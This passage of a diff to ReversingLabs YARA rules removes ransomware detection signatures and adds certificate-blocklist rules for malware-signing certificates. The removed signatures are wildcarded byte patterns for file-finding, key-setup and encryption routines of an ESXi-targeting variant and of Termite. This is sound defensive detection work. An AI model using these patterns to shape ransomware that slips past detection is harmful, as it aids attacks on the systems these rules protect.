-            DE E8 ?? ?? ?? ?? 4C 89 F9 4C 89 F2 BE ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 48 8B 44
-            24 ?? 4C 29 F0 48 89 44 24 ?? 74 ?? 49 39 C6 4C 8B 7C 24 ?? BE ?? ?? ?? ?? 4C 89 EF
-            4C 0F 47 F0 66 0F 6F 4C 24 ?? 4C 89 F9 4C 89 F2 0F 29 4C 24 ?? E8 ?? ?? ?? ?? 4C 39
-            F0 74 ?? 48 8B 7C 24 ?? 41 BC ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 FE 4C
-            89 EF E8 ?? ?? ?? ?? E9
-        }
-		$find_files_v2_p1 = {
-            41 57 4D 89 C7 41 56 49 89 FE 41 55 49 89 FD 41 54 55 53 89 CB 48 81 EC ?? ?? ?? ??
-            48 89 34 24 89 54 24 ?? 41 8B 55 ?? 49 83 C5 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ??
-            ?? ?? ?? 74 ?? 89 C2 C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 49 8D 55 ?? 4C 0F 44 EA 89 C6
-            40 00 C6 49 83 DD ?? 31 ED 4D 29 F5 74 ?? 49 8D 6D ?? 43 80 7C 2E ?? ?? 49 0F 45 ED
-            48 8D 44 24 ?? 41 89 DC 4C 89 F6 48 89 44 24 ?? 48 89 C2 BF ?? ?? ?? ?? 41 83 E4 ??
-            0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 00 83 F8
-            ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 DB 41 BC ?? ?? ?? ?? 48 8B 44 24 ?? F6 C3
-            ?? 0F 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 44 24 ?? 4C 89 7C 24 ?? 48 89 44 24 ?? 4D
-            85 FF 0F 84 ?? ?? ?? ?? 41 8B 47 ?? 8D 55 ?? 89 54 24 ?? 83 C0 ?? 89 44 24 ?? 89 44
-            24 ?? 41 8B 47 ?? 89 44 24 ?? 45 31 C0 C7 44 24 ?? ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ??
-            ?? ?? 89 D8 83 E0 ?? 89 44 24 ?? 75 ?? 44 88 5C 24 ?? 44 89 E2 48 8D 4C 24 ?? 4C 89
-            F7 48 8B 74 24 ?? 48 8B 04 24 44 89 44 24 ?? FF D0 44 8B 44 24 ?? 44 0F B6 5C 24 ??
-            85 C0 89 C2 75 ?? 4D 85 FF 0F 84 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 54 24 ?? EB ?? 0F
-            1F 44 00 ?? 4D 8B 3F 4D 85 FF 0F 84 ?? ?? ?? ?? 49 39 47 ?? 75 ?? 49 39 57 ?? 75 ??
-            31 D2 48 81 C4 ?? ?? ?? ?? 89 D0 5B 5D 41 5C 41 5D 41 5E 41 5F C3 66 90 E8 ?? ?? ??
-            ?? 85 C0 78 ?? 8B 44 24 ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 3D ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? 31 C9 45 31 DB 45 31 E4 48 8B 44 24 ?? F6 C3 ?? 0F 84 ?? ??
-            ?? ?? 4D 85 FF 0F 84 ?? ?? ?? ?? 49 39 47 ?? 75 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 4C
-        }
-		$find_files_v2_p2 = {
-            89 7C 24 ?? 48 89 44 24 ?? E9 ?? ?? ?? ?? 66 2E 0F 1F 84 00 ?? ?? 00 00 E8 ?? ?? ??
-            ?? 49 89 C4 8B 00 83 F8 ?? 0F 85 ?? ?? ?? ?? 48 8B 54 24 ?? 4C 89 F6 BF ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 DB 41 BC ?? ?? ?? ?? EB
-            ?? 0F 1F 00 8B 4C 24 ?? 85 C9 74 ?? 45 84 DB 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 43 C6 04
-            2E ?? 85 C0 0F 84 ?? ?? ?? ?? 44 89 E2 48 8D 4C 24 ?? 48 8B 74 24 ?? 4C 89 F7 48 8B
-            04 24 FF D0 89 C2 E9 ?? ?? ?? ?? 90 31 F6 4C 89 F7 31 C0 44 88 5C 24 ?? E8 ?? ?? ??
-            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? 44 0F B6 5C 24 ?? 44 8B 00 85 FF 79 ?? 41
-            83 F8 ?? BA ?? ?? ?? ?? 0F 94 C0 84 C0 B8 ?? ?? ?? ?? 44 0F 45 DA 44 0F 45 E0 8B 74
-            24 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 7C 24 ?? 44 88 5C 24 ?? 44 89 44 24 ?? E8 ?? ?? ??
-            ?? 44 0F B6 5C 24 ?? 44 8B 44 24 ?? E9 ?? ?? ?? ?? 0F 1F 00 48 89 44 24 ?? 48 8B 44
-            24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? 8D 45 ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 85 ED 74 ?? 41 80 3C 2E ?? 48 89 E8 74 ?? E9 ??
-            ?? ?? ?? 0F 1F 44 00 ?? 41 80 3C 06 ?? 0F 85 ?? ?? ?? ?? 48 83 E8 ?? 75 ?? 31 D2 89
-        }
-		$find_files_v2_p3 = {
-            54 24 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 89 D8 B9 ?? ?? ?? ?? 41 BB ?? ?? ?? ?? 83 E0 ??
-            83 F8 ?? 45 19 E4 41 83 E4 ?? 41 83 C4 ?? E9 ?? ?? ?? ?? 0F 1F 44 00 ?? 8B 54 24 ??
-            85 D2 0F 88 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 49 89 C7 48 85 C0 0F 84 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? 44 89 64 24 ?? 4C 29 E8 48 89 44 24 ?? 48 8D 44 24 ?? 48 89 44 24
-            ?? 8B 44 24 ?? 83 E8 ?? 89 44 24 ?? 4C 89 FF E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ??
-            ?? 80 78 ?? ?? 74 ?? 4C 8D 60 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 3B 44 24 ?? 0F 83 ?? ??
-            ?? ?? 41 C6 04 2E ?? 49 8D 7C 2E ?? 4C 89 E6 E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 8B 54 24
-            ?? 89 D9 48 8B 34 24 4C 89 F7 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 FF 89 04 24 E8 ?? ??
-            ?? ?? 8B 14 24 E9 ?? ?? ?? ?? 66 90 80 78 ?? ?? 74 ?? 66 83 78 ?? ?? 75 ?? EB ?? 90
-            41 80 7C 06 ?? ?? 48 8D 70 ?? 89 C2 0F 84 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 41
-            80 7C 06 ?? ?? 48 8D 50 ?? 75 ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 48 89 C2 48 85 D2 0F 84
-            ?? ?? ?? ?? 41 80 7C 16 ?? ?? 48 8D 42 ?? 75 ?? E9 ?? ?? ?? ?? 0F 1F 00 45 85 E4 0F
-            84 ?? ?? ?? ?? 31 C9 45 31 DB 41 BC ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 89 FF 44 8B 64 24
-            ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 41 8B 04 24 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 FF
-            C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 48 89 F2 E9 ?? ?? ?? ?? 44 89 04 24 E8 ?? ?? ?? ?? 44 8B 04 24 BA ?? ?? ??
-            ?? 44 89 00 E9 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 83 CA ?? E9
-        }
-		$init_key_v2 = {
-            48 85 FF 0F 84 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 41 56 41 55 41 54 55 48 89 F5
-            53 48 89 FB 48 81 EC ?? ?? ?? ?? 4C 8D 64 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ??
-            66 0F EF C0 48 8D 35 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 49 89 E6 0F 29 04 24 0F 29 44
-            24 ?? E8 ?? ?? ?? ?? 49 89 C5 48 85 C0 74 ?? 4C 89 F7 48 89 C1 BA ?? ?? ?? ?? BE ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 F6 4C 89 E7 E8
-            ?? ?? ?? ?? 85 C0 74 ?? 31 C0 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E C3 66 2E
-            0F 1F 84 00 ?? ?? 00 00 31 C0 C3 0F 1F 44 00 ?? 48 89 EA 48 89 DE 4C 89 E7 E8 ?? ??
-            ?? ?? 85 C0 75 ?? 4C 89 E7 E8 ?? ?? ?? ?? 89 E8 EB
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ULTERA" and ( pe.signatures [ i ] . serial == "00:a9:c1:52:3c:b2:c7:3a:82:77:1d:31:81:24:96:3e:87" or pe.signatures [ i ] . serial == "a9:c1:52:3c:b2:c7:3a:82:77:1d:31:81:24:96:3e:87" ) and 1499731200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_68E1B2C210B19Bb1F2A24176709B165B : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "e17bf185-3dfc-5a2f-a87f-525ac0e4084b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13838-L13854"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8e88ad992c58d37ff1ac34e2d9cf121f3bc692ae78c0ad79140974abdec2f317"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( ( all of ( $find_files_v1_p* ) ) and ( all of ( $kill_processes_v1_p* ) ) and ( $init_key_v1 ) and ( all of ( $encrypt_files_v1_p* ) ) and ( $shut_down_esxi_v1 ) ) or ( ( all of ( $find_files_v2_p* ) ) and ( all of ( $kill_processes_v2_p* ) ) and ( $init_key_v2 ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "68:e1:b2:c2:10:b1:9b:b1:f2:a2:41:76:70:9b:16:5b" and 1474502400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Termite : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5C88313Bd98Bde99C9B9Ac1408A63249 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Termite ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "350011fa-1e3c-5079-8fe7-968340a3aca0"
-		date = "2020-08-31"
-		modified = "2020-08-31"
+		id = "5108fa8f-3fe6-518c-9bae-b1c44a0ec7a8"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Termite.yara#L1-L151"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "df273de81fc58cb0bacf021ee539ec6dbfa1f1a3e13bd46519ee313595cafb4c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13856-L13872"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f958e46e00bf4ab8ecf071502bcda63a84265029bc9c72cea1eaaf72e9003a84"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Termite"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8
-            ?? ?? ?? ?? 0F 95 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D
-            ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 8B 1B 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
-            58 8B 5D ?? 89 03 68 ?? ?? ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D
-            ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85
-            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
-            45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ??
-            B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B
-            5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 75 ?? E8
-        }
-		$find_files_p2 = {
-            83 C4 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 94 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ??
-            ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85
-            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
-            45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74
-            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83
-            F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F
-            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ??
-            B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8
-        }
-		$find_files_p3 = {
-            50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74
-            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 81 7D ?? ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? FF 75 ?? 8B 5D
-            ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45
-            ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85
-            DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0
-            75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45
-            ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 6A ??
-            8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? A1 ?? ?? ?? ?? 50
-            FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 95 C0 89 45 ?? 8B 5D ??
-            85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D
-            ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45
-            ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 35 ?? ?? ?? ?? 68
-        }
-		$find_files_p4 = {
-            FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ??
-            ?? FF 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ??
-            6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? B8
-            ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? FF 75 ?? B9 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ??
-            85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ??
-            ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ??
-            ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
-            ?? 50 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50
-        }
-		$find_files_p5 = {
-            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ??
-            ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
-            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53
-            E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
-            8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8 ?? ??
-            ?? ?? 0F 95 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ??
-            0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
-            45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9
-            ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85
-            DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
-        }
-		$encrypt_files_p1 = {
-            B8 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53
-            E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
-            B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
-            58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
-            83 C4 ?? 58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ??
-            ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ??
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85
-            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
-            45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D
-        }
-		$encrypt_files_p2 = {
-            85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ??
-            ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4
-            ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ??
-            50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D
-            ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
